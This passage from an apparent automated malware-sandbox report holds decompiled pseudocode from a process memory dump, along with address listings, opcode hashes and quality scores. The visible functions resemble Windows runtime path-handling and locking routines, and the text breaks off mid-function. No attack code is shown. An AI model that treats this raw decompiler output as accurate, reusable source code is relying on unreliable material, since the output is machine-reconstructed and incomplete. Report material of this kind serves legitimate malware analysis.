                                                                                                                                    															_t307 =  *_t321 & 0xffff;
                                                                                                                                    														} else {
                                                                                                                                    															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                                                                    															E04B7F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                                                                    															_t329 = _t329 + 0xc;
                                                                                                                                    															_t311 = _v580;
                                                                                                                                    															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                                                                    															 *_t321 = _t225;
                                                                                                                                    															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                                    																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                    															}
                                                                                                                                    															goto L29;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													_t271 = _v556 - _v588 + _v588;
                                                                                                                                    													_v580 = _t307;
                                                                                                                                    													_v576 = _t271;
                                                                                                                                    													if(_t271 != 0) {
                                                                                                                                    														_t308 = _t271 & 0x0000ffff;
                                                                                                                                    														_v588 = _t308;
                                                                                                                                    														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                                                                    															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                                                                    															E04B7F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                                                                    															_t329 = _t329 + 0xc;
                                                                                                                                    															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                                                                    															 *_t321 = _t213;
                                                                                                                                    															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                                    																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													_t272 = _v560;
                                                                                                                                    													if(_t272 != 0) {
                                                                                                                                    														 *_t272 = _t321;
                                                                                                                                    													}
                                                                                                                                    													_t306 = 0;
                                                                                                                                    													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                    													_t275 = _v572;
                                                                                                                                    													if(_t275 != 0) {
                                                                                                                                    														_t306 =  *_t275;
                                                                                                                                    														if(_t306 != 0) {
                                                                                                                                    															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													_t181 = _v544;
                                                                                                                                    													if(_t181 != 0) {
                                                                                                                                    														 *_t181 = 0;
                                                                                                                                    														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                                                                    														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                                                                    														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                                                                    														if(_v540 == 5) {
                                                                                                                                    															_t182 = E04B352A5(1);
                                                                                                                                    															_v588 = _t182;
                                                                                                                                    															if(_t182 == 0) {
                                                                                                                                    																E04B4EB70(1, 0x4c279a0);
                                                                                                                                    																goto L38;
                                                                                                                                    															} else {
                                                                                                                                    																_v560 = _t182 + 0xc;
                                                                                                                                    																_t185 = E04B4AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                                                                    																if(_t185 == 0) {
                                                                                                                                    																	_t324 = _v588;
                                                                                                                                    																	goto L97;
                                                                                                                                    																} else {
                                                                                                                                    																	_t306 = _v544;
                                                                                                                                    																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                                                                    																	 *(_t306 + 4) = _t282;
                                                                                                                                    																	_v576 = _t282;
                                                                                                                                    																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                                                                    																	 *_t306 = _t325;
                                                                                                                                    																	if( *_t282 == 0x5c) {
                                                                                                                                    																		_t149 = _t325 - 2; // -2
                                                                                                                                    																		_t283 = _t149;
                                                                                                                                    																		 *_t306 = _t283;
                                                                                                                                    																		 *(_t306 + 4) = _v576 + 2;
                                                                                                                                    																		_t185 = _t283 & 0x0000ffff;
                                                                                                                                    																	}
                                                                                                                                    																	_t324 = _v588;
                                                                                                                                    																	 *(_t306 + 2) = _t185;
                                                                                                                                    																	if((_v548 & 0x00000002) == 0) {
                                                                                                                                    																		L97:
                                                                                                                                    																		asm("lock xadd [esi], eax");
                                                                                                                                    																		if((_t185 | 0xffffffff) == 0) {
                                                                                                                                    																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                                                                    																			E04B795D0();
                                                                                                                                    																			L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                                                                    																		}
                                                                                                                                    																	} else {
                                                                                                                                    																		 *(_t306 + 0xc) = _t324;
                                                                                                                                    																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                                                                    																	}
                                                                                                                                    																	goto L38;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    															goto L41;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													L38:
                                                                                                                                    													_t322 = 0;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    									L39:
                                                                                                                                    									if(_t254 !=  &_v532) {
                                                                                                                                    										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                                                                    									}
                                                                                                                                    									_t169 = _t322;
                                                                                                                                    								}
                                                                                                                                    								goto L41;
                                                                                                                                    							}
                                                                                                                                    							goto L68;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L41:
                                                                                                                                    					_pop(_t317);
                                                                                                                                    					_pop(_t323);
                                                                                                                                    					_pop(_t255);
                                                                                                                                    					return E04B7B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                                                                    				} else {
                                                                                                                                    					_t299 = __edx[2];
                                                                                                                                    					if( *_t299 == 0x5c) {
                                                                                                                                    						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                                                                    						if(_t256 != 0x5c) {
                                                                                                                                    							if(_t256 != 0x3f) {
                                                                                                                                    								goto L2;
                                                                                                                                    							} else {
                                                                                                                                    								goto L50;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							L50:
                                                                                                                                    							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                                                                    								goto L2;
                                                                                                                                    							} else {
                                                                                                                                    								_t251 = E04B73D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                                                                    								_pop(_t319);
                                                                                                                                    								_pop(_t326);
                                                                                                                                    								_pop(_t257);
                                                                                                                                    								return E04B7B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						L2:
                                                                                                                                    						_t260 = _v572;
                                                                                                                                    						goto L3;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L101:
                                                                                                                                    			}

                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541da
                                                                                                                                    0x04b541da
                                                                                                                                    0x04b541df
                                                                                                                                    0x04b541e4
                                                                                                                                    0x04b541ec
                                                                                                                                    0x04b54203
                                                                                                                                    0x04b54207
                                                                                                                                    0x04b9e1fd
                                                                                                                                    0x04b54222
                                                                                                                                    0x04b54226
                                                                                                                                    0x04b9e1f3
                                                                                                                                    0x04b9e1f3
                                                                                                                                    0x04b5422c
                                                                                                                                    0x04b5422c
                                                                                                                                    0x04b54233
                                                                                                                                    0x04b9e1ed
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54239
                                                                                                                                    0x04b54233
                                                                                                                                    0x04b54226
                                                                                                                                    0x04b541ee
                                                                                                                                    0x04b541ee
                                                                                                                                    0x04b541f4
                                                                                                                                    0x04b54575
                                                                                                                                    0x04b9e1b1
                                                                                                                                    0x04b9e1b1
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5457b
                                                                                                                                    0x04b5457b
                                                                                                                                    0x04b54582
                                                                                                                                    0x04b9e1ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54588
                                                                                                                                    0x04b54588
                                                                                                                                    0x04b5458c
                                                                                                                                    0x04b9e1c4
                                                                                                                                    0x04b9e1c4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54592
                                                                                                                                    0x04b54592
                                                                                                                                    0x04b54599
                                                                                                                                    0x04b9e1be
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5459f
                                                                                                                                    0x04b5459f
                                                                                                                                    0x04b545a3
                                                                                                                                    0x04b9e1d7
                                                                                                                                    0x04b9e1e4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545a9
                                                                                                                                    0x04b545a9
                                                                                                                                    0x04b545b0
                                                                                                                                    0x04b9e1d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545b6
                                                                                                                                    0x04b545b6
                                                                                                                                    0x04b545b6
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545b6
                                                                                                                                    0x04b545b0
                                                                                                                                    0x04b545a3
                                                                                                                                    0x04b54599
                                                                                                                                    0x04b5458c
                                                                                                                                    0x04b54582
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b541f4
                                                                                                                                    0x04b5423e
                                                                                                                                    0x04b54241
                                                                                                                                    0x04b545c0
                                                                                                                                    0x04b545c4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545ca
                                                                                                                                    0x04b545ca
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e207
                                                                                                                                    0x04b9e20f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545ca
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54247
                                                                                                                                    0x04b54247
                                                                                                                                    0x04b54247
                                                                                                                                    0x04b54249
                                                                                                                                    0x04b54249
                                                                                                                                    0x04b54249
                                                                                                                                    0x04b54251
                                                                                                                                    0x04b54251
                                                                                                                                    0x04b54257
                                                                                                                                    0x04b5425f
                                                                                                                                    0x04b5426e
                                                                                                                                    0x04b54270
                                                                                                                                    0x04b5427a
                                                                                                                                    0x04b9e219
                                                                                                                                    0x04b9e219
                                                                                                                                    0x04b54280
                                                                                                                                    0x04b54282
                                                                                                                                    0x04b54456
                                                                                                                                    0x04b545ea
                                                                                                                                    0x00000000
                                                                                                                                    0x04b545f0
                                                                                                                                    0x04b9e223
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9e223
                                                                                                                                    0x04b5445c
                                                                                                                                    0x04b5445c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5445c
                                                                                                                                    0x00000000
                                                                                                                                    0x04b54288
                                                                                                                                    0x04b5428c
                                                                                                                                    0x04b9e298
                                                                                                                                    0x04b54292
                                                                                                                                    0x04b54292
                                                                                                                                    0x04b5429e
                                                                                                                                    0x04b542a3
                                                                                                                                    0x04b542a7
                                                                                                                                    0x04b542ac
                                                                                                                                    0x04b9e22d
                                                                                                                                    0x04b542b2
                                                                                                                                    0x04b542b2
                                                                                                                                    0x04b542b9
                                                                                                                                    0x04b542bc
                                                                                                                                    0x04b542c2
                                                                                                                                    0x04b542ca
                                                                                                                                    0x04b542cd
                                                                                                                                    0x04b542cd
                                                                                                                                    0x04b542d4
                                                                                                                                    0x04b5433f
                                                                                                                                    0x04b5433f
                                                                                                                                    0x04b542d6
                                                                                                                                    0x04b542d6
                                                                                                                                    0x04b542d9
                                                                                                                                    0x04b542dd
                                                                                                                                    0x04b542eb
                                                                                                                                    0x04b9e23a
                                                                                                                                    0x04b542f1
                                                                                                                                    0x04b54305
                                                                                                                                    0x04b5430d
                                                                                                                                    0x04b54315
                                                                                                                                    0x04b54318
                                                                                                                                    0x04b5431f
                                                                                                                                    0x04b54322
                                                                                                                                    0x04b5432e
                                                                                                                                    0x04b5433b
                                                                                                                                    0x04b5433b
                                                                                                                                    0x00000000
                                                                                                                                    0x04b5432e
                                                                                                                                    0x04b542eb
                                                                                                                                    0x04b5434c
                                                                                                                                    0x04b5434e
                                                                                                                                    0x04b54352
                                                                                                                                    0x04b54359
                                                                                                                                    0x04b5435e
                                                                                                                                    0x04b54361
                                                                                                                                    0x04b5436e
                                                                                                                                    0x04b5438a
                                                                                                                                    0x04b5438e
                                                                                                                                    0x04b54396
                                                                                                                                    0x04b5439e
                                                                                                                                    0x04b543a1
                                                                                                                                    0x04b543ad
                                                                                                                                    0x04b543bb
                                                                                                                                    0x04b543bb
                                                                                                                                    0x04b543ad
                                                                                                                                    0x04b5436e
                                                                                                                                    0x04b543bf
                                                                                                                                    0x04b543c5
                                                                                                                                    0x04b54463
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a7fac64c8bb541226cbadb3f0acb0ae4efdfdab8476f60304e7f67d9dc4831f9
                                                                                                                                    • Instruction ID: 025b94197c9989b44b37238b82c7f9186bdeb1a5805a9a4445b82b3700efdc67
                                                                                                                                    • Opcode Fuzzy Hash: a7fac64c8bb541226cbadb3f0acb0ae4efdfdab8476f60304e7f67d9dc4831f9
                                                                                                                                    • Instruction Fuzzy Hash: 97F16F706082518BDB14CF19C480B3AF7E1FF88758F1449AEF886CB2A0E735E995DB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E04B352A5(char __ecx) {
                                                                                                                                    				char _v20;
                                                                                                                                    				char _v28;
                                                                                                                                    				char _v29;
                                                                                                                                    				void* _v32;
                                                                                                                                    				void* _v36;
                                                                                                                                    				void* _v37;
                                                                                                                                    				void* _v38;
                                                                                                                                    				void* _v40;
                                                                                                                                    				void* _v46;
                                                                                                                                    				void* _v64;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                    				signed int _t53;
                                                                                                                                    				short _t85;
                                                                                                                                    				signed int _t87;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				signed int _t89;
                                                                                                                                    				intOrPtr _t101;
                                                                                                                                    				intOrPtr* _t102;
                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                    				signed int _t106;
                                                                                                                                    				void* _t108;
                                                                                                                                    
                                                                                                                                    				_t93 = __ecx;
                                                                                                                                    				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                                                                    				_push(_t88);
                                                                                                                                    				_v29 = __ecx;
                                                                                                                                    				_t89 = _t88 | 0xffffffff;
                                                                                                                                    				while(1) {
                                                                                                                                    					E04B4EEF0(0x4c279a0);
                                                                                                                                    					_t104 =  *0x4c28210; // 0x932bc8
                                                                                                                                    					if(_t104 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					asm("lock inc dword [esi]");
                                                                                                                                    					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                                                                                    					E04B4EB70(_t93, 0x4c279a0);
                                                                                                                                    					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                                                                    						_t101 =  *0x7ffe02dc;
                                                                                                                                    						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                                                    						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                                                                    							L9:
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0x90028);
                                                                                                                                    							_push(_t108 + 0x20);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                    							_t53 = E04B79890();
                                                                                                                                    							__eflags = _t53;
                                                                                                                                    							if(_t53 >= 0) {
                                                                                                                                    								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                                                    								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                                                                    									E04B4EEF0(0x4c279a0);
                                                                                                                                    									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                                                                    									E04B4EB70(0, 0x4c279a0);
                                                                                                                                    								}
                                                                                                                                    								goto L3;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t53 - 0xc0000012;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								L12:
                                                                                                                                    								_t13 = _t104 + 0xc; // 0x932bd5
                                                                                                                                    								_t93 = _t13;
                                                                                                                                    								 *((char*)(_t108 + 0x12)) = 0;
                                                                                                                                    								__eflags = E04B6F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                    									L15:
                                                                                                                                    									_t102 = _v28;
                                                                                                                                    									 *_t102 = 2;
                                                                                                                                    									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                                                    									E04B4EEF0(0x4c279a0);
                                                                                                                                    									__eflags =  *0x4c28210 - _t104; // 0x932bc8
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										__eflags =  *((char*)(_t108 + 0xe));
                                                                                                                                    										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                                                                    										 *0x4c28210 = _t102;
                                                                                                                                    										_t32 = _t102 + 0xc; // 0x0
                                                                                                                                    										 *_t95 =  *_t32;
                                                                                                                                    										_t33 = _t102 + 0x10; // 0x0
                                                                                                                                    										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                                                                    										_t35 = _t102 + 4; // 0xffffffff
                                                                                                                                    										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                    											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                                                                                    											E04BB4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                                                                                    										}
                                                                                                                                    										E04B4EB70(_t95, 0x4c279a0);
                                                                                                                                    										asm("lock xadd [esi], eax");
                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                    											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                    											E04B795D0();
                                                                                                                                    											L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                                    										}
                                                                                                                                    										asm("lock xadd [esi], ebx");
                                                                                                                                    										__eflags = _t89 == 1;
                                                                                                                                    										if(_t89 == 1) {
                                                                                                                                    											_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                    											E04B795D0();
                                                                                                                                    											L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                                    											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                                    										}
                                                                                                                                    										_t49 = _t102;
                                                                                                                                    										L4:
                                                                                                                                    										return _t49;
                                                                                                                                    									}
                                                                                                                                    									E04B4EB70(_t93, 0x4c279a0);
                                                                                                                                    									asm("lock xadd [esi], eax");
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										_push( *((intOrPtr*)(_t104 + 4)));
                                                                                                                                    										E04B795D0();
                                                                                                                                    										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                                    										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                                    									}
                                                                                                                                    									 *_t102 = 1;
                                                                                                                                    									asm("lock xadd [edi], eax");
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										_t28 = _t102 + 4; // 0xffffffff
                                                                                                                                    										_push( *_t28);
                                                                                                                                    										E04B795D0();
                                                                                                                                    										L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                                                                    									}
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								_t93 =  &_v20;
                                                                                                                                    								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                                                                                    								_t85 = 6;
                                                                                                                                    								_v20 = _t85;
                                                                                                                                    								_t87 = E04B6F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                                                                                    								__eflags = _t87;
                                                                                                                                    								if(_t87 < 0) {
                                                                                                                                    									goto L3;
                                                                                                                                    								}
                                                                                                                                    								 *((char*)(_t108 + 0xe)) = 1;
                                                                                                                                    								goto L15;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t53 - 0xc000026e;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								goto L3;
                                                                                                                                    							}
                                                                                                                                    							goto L12;
                                                                                                                                    						}
                                                                                                                                    						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                                                                    						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                                                                    							goto L3;
                                                                                                                                    						} else {
                                                                                                                                    							goto L9;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					L3:
                                                                                                                                    					_t49 = _t104;
                                                                                                                                    					goto L4;
                                                                                                                                    				}
                                                                                                                                    				_t49 = 0;
                                                                                                                                    				goto L4;
                                                                                                                                    			}


























                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3891c2bd3cf269b9dfc31e7166430464d7757ba78068061c7c4babb1fd8967b0
                                                                                                                                    • Instruction ID: f3bc034736d42ad7894e2194fb7ab7348d80ff6cffa27216649a90baf4012f22
                                                                                                                                    • Opcode Fuzzy Hash: 3891c2bd3cf269b9dfc31e7166430464d7757ba78068061c7c4babb1fd8967b0
                                                                                                                                    • Instruction Fuzzy Hash: B551DE71205742AFEB20EF69C980B27BBE4FF84714F1409AEE49587651E7B4F840DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E04B4EF40(intOrPtr __ecx) {
                                                                                                                                    				char _v5;
                                                                                                                                    				char _v6;
                                                                                                                                    				char _v7;
                                                                                                                                    				char _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				intOrPtr _t58;
                                                                                                                                    				char _t59;
                                                                                                                                    				signed char _t69;
                                                                                                                                    				void* _t73;
                                                                                                                                    				signed int _t74;
                                                                                                                                    				char _t79;
                                                                                                                                    				signed char _t81;
                                                                                                                                    				signed int _t85;
                                                                                                                                    				signed int _t87;
                                                                                                                                    				intOrPtr _t90;
                                                                                                                                    				signed char* _t91;
                                                                                                                                    				void* _t92;
                                                                                                                                    				signed int _t94;
                                                                                                                                    				void* _t96;
                                                                                                                                    
                                                                                                                                    				_t90 = __ecx;
                                                                                                                                    				_v16 = __ecx;
                                                                                                                                    				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                                                                                    					_t58 =  *((intOrPtr*)(__ecx));
                                                                                                                                    					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                                                                                    						E04B39080(_t73, __ecx, __ecx, _t92);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				_t74 = 0;
                                                                                                                                    				_t96 =  *0x7ffe036a - 1;
                                                                                                                                    				_v12 = 0;
                                                                                                                                    				_v7 = 0;
                                                                                                                                    				if(_t96 > 0) {
                                                                                                                                    					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                                                                                    					_v12 = _t74;
                                                                                                                                    					_v7 = _t96 != 0;
                                                                                                                                    				}
                                                                                                                                    				_t79 = 0;
                                                                                                                                    				_v8 = 0;
                                                                                                                                    				_v5 = 0;
                                                                                                                                    				while(1) {
                                                                                                                                    					L4:
                                                                                                                                    					_t59 = 1;
                                                                                                                                    					L5:
                                                                                                                                    					while(1) {
                                                                                                                                    						if(_t59 == 0) {
                                                                                                                                    							L12:
                                                                                                                                    							_t21 = _t90 + 4; // 0x770bc21e
                                                                                                                                    							_t87 =  *_t21;
                                                                                                                                    							_v6 = 0;
                                                                                                                                    							if(_t79 != 0) {
                                                                                                                                    								if((_t87 & 0x00000002) != 0) {
                                                                                                                                    									goto L19;
                                                                                                                                    								}
                                                                                                                                    								if((_t87 & 0x00000001) != 0) {
                                                                                                                                    									_v6 = 1;
                                                                                                                                    									_t74 = _t87 ^ 0x00000003;
                                                                                                                                    								} else {
                                                                                                                                    									_t51 = _t87 - 2; // -2
                                                                                                                                    									_t74 = _t51;
                                                                                                                                    								}
                                                                                                                                    								goto L15;
                                                                                                                                    							} else {
                                                                                                                                    								if((_t87 & 0x00000001) != 0) {
                                                                                                                                    									_v6 = 1;
                                                                                                                                    									_t74 = _t87 ^ 0x00000001;
                                                                                                                                    								} else {
                                                                                                                                    									_t26 = _t87 - 4; // -4
                                                                                                                                    									_t74 = _t26;
                                                                                                                                    									if((_t74 & 0x00000002) == 0) {
                                                                                                                                    										_t74 = _t74 - 2;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								L15:
                                                                                                                                    								if(_t74 == _t87) {
                                                                                                                                    									L19:
                                                                                                                                    									E04B32D8A(_t74, _t90, _t87, _t90);
                                                                                                                                    									_t74 = _v12;
                                                                                                                                    									_v8 = 1;
                                                                                                                                    									if(_v7 != 0 && _t74 > 0x64) {
                                                                                                                                    										_t74 = _t74 - 1;
                                                                                                                                    										_v12 = _t74;
                                                                                                                                    									}
                                                                                                                                    									_t79 = _v5;
                                                                                                                                    									goto L4;
                                                                                                                                    								}
                                                                                                                                    								asm("lock cmpxchg [esi], ecx");
                                                                                                                                    								if(_t87 != _t87) {
                                                                                                                                    									_t74 = _v12;
                                                                                                                                    									_t59 = 0;
                                                                                                                                    									_t79 = _v5;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								if(_v6 != 0) {
                                                                                                                                    									_t74 = _v12;
                                                                                                                                    									L25:
                                                                                                                                    									if(_v7 != 0) {
                                                                                                                                    										if(_t74 < 0x7d0) {
                                                                                                                                    											if(_v8 == 0) {
                                                                                                                                    												_t74 = _t74 + 1;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										_t38 = _t90 + 0x14; // 0x0
                                                                                                                                    										_t39 = _t90 + 0x14; // 0x0
                                                                                                                                    										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                                                                                    										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                                                    											_t85 = _t85 & 0xff000000;
                                                                                                                                    										}
                                                                                                                                    										 *(_t90 + 0x14) = _t85;
                                                                                                                                    									}
                                                                                                                                    									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                    									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                                                                                    									return 0;
                                                                                                                                    								}
                                                                                                                                    								_v5 = 1;
                                                                                                                                    								_t87 = _t74;
                                                                                                                                    								goto L19;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t94 = _t74;
                                                                                                                                    						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                                                                                    						if(_t74 == 0) {
                                                                                                                                    							goto L12;
                                                                                                                                    						} else {
                                                                                                                                    							_t91 = _t90 + 4;
                                                                                                                                    							goto L8;
                                                                                                                                    							L9:
                                                                                                                                    							while((_t81 & 0x00000001) != 0) {
                                                                                                                                    								_t69 = _t81;
                                                                                                                                    								asm("lock cmpxchg [edi], edx");
                                                                                                                                    								if(_t69 != _t81) {
                                                                                                                                    									_t81 = _t69;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								_t90 = _v16;
                                                                                                                                    								goto L25;
                                                                                                                                    							}
                                                                                                                                    							asm("pause");
                                                                                                                                    							_t94 = _t94 - 1;
                                                                                                                                    							if(_t94 != 0) {
